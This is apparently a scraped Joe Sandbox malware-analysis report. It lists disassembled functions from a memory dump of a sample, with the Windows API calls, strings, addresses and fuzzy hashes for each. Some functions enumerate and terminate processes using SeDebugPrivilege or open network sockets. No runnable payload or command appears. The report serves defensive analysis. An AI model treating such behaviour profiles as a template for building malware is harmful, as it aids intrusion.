                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: ca4f2f7421b4198138cc045ac68b472aa705bb913cb73bf30a85469c85b9d4f7
                                                      • Instruction ID: 50f196ab1dbc9ea959166555b537ec45a9e882fa869a6ad320d4150c705fd476
                                                      • Opcode Fuzzy Hash: ca4f2f7421b4198138cc045ac68b472aa705bb913cb73bf30a85469c85b9d4f7
                                                      • Instruction Fuzzy Hash: 980154B5640348FFE610EBA5DC89F6B7BACEB89711F418521FB05DF2A1CA759801CB60
                                                      Function 00AD9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 7de114e858cc7f191d4446433c1c41fe43777b6e4427949ddb1afbc931259c63
                                                      • Instruction ID: 34c47398f0be943ab9ff646c4edca4a66168e4ad1f1a1a7031565f448b45c50f
                                                      • Opcode Fuzzy Hash: 7de114e858cc7f191d4446433c1c41fe43777b6e4427949ddb1afbc931259c63
                                                      • Instruction Fuzzy Hash: AA919F71A00215ABDF24DFA5D848FAFBBB8EF45714F10815AF516AB280D770E945CFA0
                                                      Function 00AD9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?,?,00AB799D), ref: 00AB766F
                                                        • Part of subcall function 00AB7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB768A
                                                        • Part of subcall function 00AB7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB7698
                                                        • Part of subcall function 00AB7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?), ref: 00AB76A8
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00AD9B1B
                                                      • _memset.LIBCMT ref: 00AD9B28
                                                      • _memset.LIBCMT ref: 00AD9C6B
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00AD9C97
                                                      • CoTaskMemFree.OLE32(?), ref: 00AD9CA2
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 00AD9CF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: c84785a8540af42dc0da00b89ce138ca70d69a57b47ecdd74da221060ab7db05
                                                      • Instruction ID: e0a530f86d2687381d1a69324e665b19f304cbd20fba7c2059e6b35f4a75a04c
                                                      • Opcode Fuzzy Hash: c84785a8540af42dc0da00b89ce138ca70d69a57b47ecdd74da221060ab7db05
                                                      • Instruction Fuzzy Hash: 56913871D00219AFDB10DFA4DD84ADEBBB9FF08710F20415AF51AA7281DB719A45CFA0
                                                      Function 00AE6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AE7093
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AE70A7
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AE70C1
                                                      • _wcscat.LIBCMT ref: 00AE711C
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AE7133
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AE7161
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 8f3b02cf6a8aa8c07e190171dcf1c0ba79bf368814708740afcafacab13be317
                                                      • Instruction ID: 69b57babad79796e58d2c073f431a279900e0c7dd2382be89598035cfbb642e8
                                                      • Opcode Fuzzy Hash: 8f3b02cf6a8aa8c07e190171dcf1c0ba79bf368814708740afcafacab13be317
                                                      • Instruction Fuzzy Hash: 4041A271A04388AFEB21DFA5CC85BEE77F8EF08350F10056AF944A71A2D7719D858B60
                                                      Function 00ADEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AC3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00AC3EB6
                                                        • Part of subcall function 00AC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00AC3EC4
                                                        • Part of subcall function 00AC3E91: CloseHandle.KERNEL32(00000000), ref: 00AC3F8E
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECB8
                                                      • GetLastError.KERNEL32 ref: 00ADECCB
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECFA
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ADED77
                                                      • GetLastError.KERNEL32(00000000), ref: 00ADED82
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ADEDB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: f2c8690a5a07424cd9e56b5aecc66c88dc8be2a6d82c300685d79fb4d9f49116
                                                      • Instruction ID: 9bcd6dae1e50535a10b336c019c6306788013646c9c929a0e76311b20f39b67a
                                                      • Opcode Fuzzy Hash: f2c8690a5a07424cd9e56b5aecc66c88dc8be2a6d82c300685d79fb4d9f49116
                                                      • Instruction Fuzzy Hash: 8241AC712002019FDB14EF24CD95F6EB7A9AF80714F08805DF9829F3D2DB74A905CB91
                                                      Function 00AC3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00AC32C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 29d42cc5c48bd9b8d6fc321176ccaef105deba9bfd32f91b4439b5a21e003613
                                                      • Instruction ID: 025d4ec7c97da12382de8010e1e8b8a3e4bf6bbca24598b7e801c92e52ed7005
                                                      • Opcode Fuzzy Hash: 29d42cc5c48bd9b8d6fc321176ccaef105deba9bfd32f91b4439b5a21e003613
                                                      • Instruction Fuzzy Hash: 8B11EB33209346BAAF015B54DC42EEAB7ECDF2AB70F11406EF50066181D6B56B4046A5
                                                      Function 00AC4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AC454E
                                                      • LoadStringW.USER32(00000000), ref: 00AC4555
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AC456B
                                                      • LoadStringW.USER32(00000000), ref: 00AC4572
                                                      • _wprintf.LIBCMT ref: 00AC4598
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AC45B6
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00AC4593
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: de2871ff395648ae4746bdaf7f20d386015876cd9cd0e46373a3630d1176fbc8
                                                      • Instruction ID: 2d883152acb0e8a2d00ca2d0857fa117babb39a5a0e7dc8fa1be8df84cf39f30
                                                      • Opcode Fuzzy Hash: de2871ff395648ae4746bdaf7f20d386015876cd9cd0e46373a3630d1176fbc8
                                                      • Instruction Fuzzy Hash: 96014FF290024CBFE720E7E0DD89EE6776CD708301F4005A5BB49E6051EA749E868B74
                                                      Function 00AED74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00AED78A
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00AED7AA
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00AED9E5
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AEDA03
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AEDA24
                                                      • ShowWindow.USER32(00000003,00000000), ref: 00AEDA43
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AEDA68
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00AEDA8B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 447fcae1c5f00400ee652399fbbbab003aa7b9652dcdbc215c13cd51fea2d451
                                                      • Instruction ID: 94d5585c11028aee7f7535807217c6fdd3e7062e339dd188dbf2ef96ff30042e
                                                      • Opcode Fuzzy Hash: 447fcae1c5f00400ee652399fbbbab003aa7b9652dcdbc215c13cd51fea2d451
                                                      • Instruction Fuzzy Hash: A3B166716002A5AFDF14CF6AC9C57B97BB1FF44701F098069EC489F696D734AA50CBA0
                                                      Function 00A62A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A62ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000,000000FF), ref: 00A62B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A9C46A
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A9C4D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 21003dfde30c17f3c2250722357c68dc23346d53e3f37f8b2311fbfd59555861
                                                      • Instruction ID: 162c50f02158823c85bb59173c11174616a30b7b01bf230b41a34219f44866cb
                                                      • Opcode Fuzzy Hash: 21003dfde30c17f3c2250722357c68dc23346d53e3f37f8b2311fbfd59555861
                                                      • Instruction Fuzzy Hash: 4141E931704FC09EDB358B689DDCB7A7BF2EBA5350F14891DE0878A561C6B59842E710
                                                      Function 00AC7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AC737F
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AC73B6
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AC73D2
                                                      • _memmove.LIBCMT ref: 00AC7420
                                                      • _memmove.LIBCMT ref: 00AC743D
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AC744C
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AC7461
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AC7480
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 81c48d0dcbdc26cdd804f9dfcf8eb6688b27ace86951f4a68fc6196b7ab952c6
                                                      • Instruction ID: c2a07a05db6864ebff1313aa1384444a6a0888a2b2178546f5414d5ec3cd8d62
                                                      • Opcode Fuzzy Hash: 81c48d0dcbdc26cdd804f9dfcf8eb6688b27ace86951f4a68fc6196b7ab952c6
                                                      • Instruction Fuzzy Hash: 0D316D71904245EFCF10EFA4DD85EAE7BB8EF44710B1581A9FA04AB256DB309A15CBA0
                                                      Function 00AE6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00AE645A
                                                      • GetDC.USER32(00000000), ref: 00AE6462
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE646D
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00AE6479
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AE64B5
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AE64C6
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AE9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00AE6500
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AE6520
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 3df104ce5bb161007a64416604e111603dabf4315be5702ea4c2d6db101f7b15
                                                      • Instruction ID: 9151ff301a2b16a7e32d8f84fa72b0e137716305c5814073ccacd9f622f4c2c3
                                                      • Opcode Fuzzy Hash: 3df104ce5bb161007a64416604e111603dabf4315be5702ea4c2d6db101f7b15
                                                      • Instruction Fuzzy Hash: C7318B72201294BFEB118F55CC8AFEA3FA9EF19761F044065FE089E291D6759842CB70
                                                      Function 00ABC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 6d856b4bf75c89b766a78f7ef75269fea6eb2f3152141b5ec9c7fe3ec60324c5
                                                      • Instruction ID: 6db527369618c6034f8376e7ff8110acf1433fcde4422c6f6e132ba08a5de1cd
                                                      • Opcode Fuzzy Hash: 6d856b4bf75c89b766a78f7ef75269fea6eb2f3152141b5ec9c7fe3ec60324c5
                                                      • Instruction Fuzzy Hash: C0216271742209BBE614B6259E46FFB33ACAF503B4B044021FE05A6283F755DE1383A5
                                                      Function 00ACED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • _wcstok.LIBCMT ref: 00ACEEFF
                                                      • _wcscpy.LIBCMT ref: 00ACEF8E
                                                      • _memset.LIBCMT ref: 00ACEFC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 1766be0af2663c35199a0abd8a717b87c7bb066d779ea8e5c7d72508eb2d6929
                                                      • Instruction ID: fd554cb0aeededd6fd97fd3d1c43be7e75cd43457c1f71ebe4a31ef985480fad
                                                      • Opcode Fuzzy Hash: 1766be0af2663c35199a0abd8a717b87c7bb066d779ea8e5c7d72508eb2d6929
                                                      • Instruction Fuzzy Hash: DCC16A315083409FCB24EF24CA95E6EB7F4AF84314F05496DF9999B2A2DB30ED45CB82
                                                      Function 00AD6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AD6F14
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AD6F35
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6F48
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00AD6FFE
                                                      • inet_ntoa.WSOCK32(?), ref: 00AD6FBB
                                                        • Part of subcall function 00ABAE14: _strlen.LIBCMT ref: 00ABAE1E
                                                        • Part of subcall function 00ABAE14: _memmove.LIBCMT ref: 00ABAE40
                                                      • _strlen.LIBCMT ref: 00AD7058
                                                      • _memmove.LIBCMT ref: 00AD70C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 83e852136eea0412e2aca4c8fe67a94ecf30b14416f85675dec239f3fdb47415
                                                      • Instruction ID: 6aa807b438966ccb084e17b14ed4e14c0a370088fc8ae2770acbb697b2d6f32d
                                                      • Opcode Fuzzy Hash: 83e852136eea0412e2aca4c8fe67a94ecf30b14416f85675dec239f3fdb47415
                                                      • Instruction Fuzzy Hash: 6581CD31508300AFD714EB24CD86E6FB3B9EF84714F148A1EF5569B2E2DA71AD05CB92
                                                      Function 00A61424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
